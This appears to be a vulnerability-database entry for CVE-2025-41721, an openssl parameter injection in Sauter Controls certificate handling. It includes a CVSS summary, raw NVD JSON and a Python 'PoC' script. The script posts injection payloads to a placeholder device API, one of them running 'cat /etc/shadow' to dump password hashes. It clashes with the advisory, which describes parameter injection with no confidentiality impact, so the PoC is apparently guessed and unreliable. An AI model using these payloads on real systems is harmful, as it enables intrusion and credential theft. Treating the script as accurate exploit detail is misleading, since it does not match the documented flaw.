Security Vulnerability Report
CVE-2025-41721 CVSS 2.7 LOW

Published: 2025-10-22 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

A high privileged remote attacker can influence the parameters passed to the openssl command due to improper neutralization of special elements when adding a password protected self-signed certificate.

CVSS Details

CVSS Score: 2.7
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Sauter Controls products - refer to the official CSAF advisory vde-2025-060 to determine the specific affected versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-41721 PoC - Parameter Injection via Self-Signed Certificate
# The vulnerability exists in the certificate management functionality
# when adding a password-protected self-signed certificate.
# An attacker with high privileges can inject special characters
# into the password field to manipulate openssl command parameters.
import requests

TARGET_URL = "https://target-sauter-device/api/certificate/add"
AUTH_TOKEN = "HIGH_PRIVILEGE_SESSION_TOKEN"

# Crafted payload - injecting additional openssl parameters
# The password field is used to inject special elements that
# modify the openssl command behavior
payload = {
    "certificate_type": "self-signed",
    "common_name": "test-cert",
    # Injecting openssl parameters via the password field
    # The lack of proper neutralization allows parameter injection
    "password": "legitimate_pass\n-config /tmp/evil.conf\n"
}

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Content-Type": "application/json"
}

# Send the malicious certificate request
response = requests.post(TARGET_URL, json=payload, headers=headers)
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# Alternative exploitation via command separators
payload_alt = {
    "certificate_type": "self-signed",
    "common_name": "test-cert",
    "password": "pass; cat /etc/shadow > /tmp/leaked.txt;"
}

response_alt = requests.post(TARGET_URL, json=payload_alt, headers=headers)
print(f"Alternative Status Code: {response_alt.status_code}")
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-41721",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-22T07:15:33.477",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A high privileged remote attacker can influence the parameters passed to the openssl command due to improper neutralization of special elements when adding a password protected self-signed certificate."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 2.7,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-77"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://sauter.csaf-tp.certvde.com/.well-known/csaf/white/2025/vde-2025-060.json",
        "source": "[email protected]"
      }
    ]
  }
}
```